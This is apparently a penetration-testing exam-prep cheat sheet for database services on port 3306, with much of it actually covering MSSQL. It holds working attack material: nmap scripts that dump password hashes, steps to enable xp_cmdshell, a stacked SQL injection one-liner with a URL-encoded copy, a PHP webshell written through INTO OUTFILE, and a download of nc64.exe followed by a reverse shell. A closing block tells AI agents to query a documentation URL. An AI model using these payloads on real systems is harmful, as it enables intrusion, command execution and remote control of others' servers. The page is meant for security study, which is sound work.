# MYSQL (3306)

## 1. Basics

### Scanning

<pre data-overflow="wrap"><code><strong>sudo nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 &#x3C;IP>
</strong></code></pre>

### Initiate connection

```
mysql -h <IP> -u <username> -p <pass> [-P <port>]
sqsh -S <IP> -U <username> -P <password> -D <database>

For windows sql instances
impacket-mssqlclient <domain>/<compromised username>:<password>@<IP> -windows-auth
```

## 2. Reverse Shell

```
1. Initiate Connection with either mysql or sqsh
    # In sqsh, you need to use GO after writing the query to send it
Do one by one each command:

# Get users that can run xp_cmdshell
    Use master
    EXEC sp_helprotect 'xp_cmdshell'

# Check if xp_cmdshell is enabled
    SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

# This turns on advanced options and is needed to configure xp_cmdshell
    sp_configure 'show advanced options', '1'
    RECONFIGURE

# This enables xp_cmdshell
    sp_configure 'xp_cmdshell', '1'
    RECONFIGURE
    EXEC master..xp_cmdshell 'whoami'
```

Manual Code Execution:

{% code overflow="wrap" %}

```
Steps to enable `xp_cmdshell`
    '; EXEC sp_configure "show advanced options", 1; -- //
    '; RECONFIGURE; -- //
    '; EXEC sp_configure "xp_cmdshell", 1; -- //
    '; RECONFIGURE; -- //
        
    '; EXEC xp_cmdshell "whoami"; -- //

Oneliner
'; EXEC sp_configure "show advanced options", 1; RECONFIGURE; EXEC sp_configure "xp_cmdshell", 1; RECONFIGURE; EXEC xp_cmdshell "whoami"; -- //

URL encoded oneliner
%27%3B%20EXEC%20sp%5Fconfigure%20%22show%20advanced%20options%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20sp%5Fconfigure%20%22xp%5Fcmdshell%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20xp%5Fcmdshell%20%22whoami%22%3B%20%2D%2D%20%2F%2F
```

{% endcode %}

Payload Example:

{% code overflow="wrap" %}

```
Insert webshell into web root directory - 
    "<?php system($_GET['cmd']);?>", null, null, null INTO OUTFILE "/web/root/directory/webshell.php"
    
Initiating reverse shell with nc64.exe via injected webshell - 
    curl http://<IP>/nc64.exe -o c:/windows/temp/nc64.exe
    c:/windows/temp/nc64.exe -e cmd.exe <IP> <port>
```

{% endcode %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://personal-archive.gitbook.io/oscp-exam-prep/commons/service-enumeration/mysql-3306.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.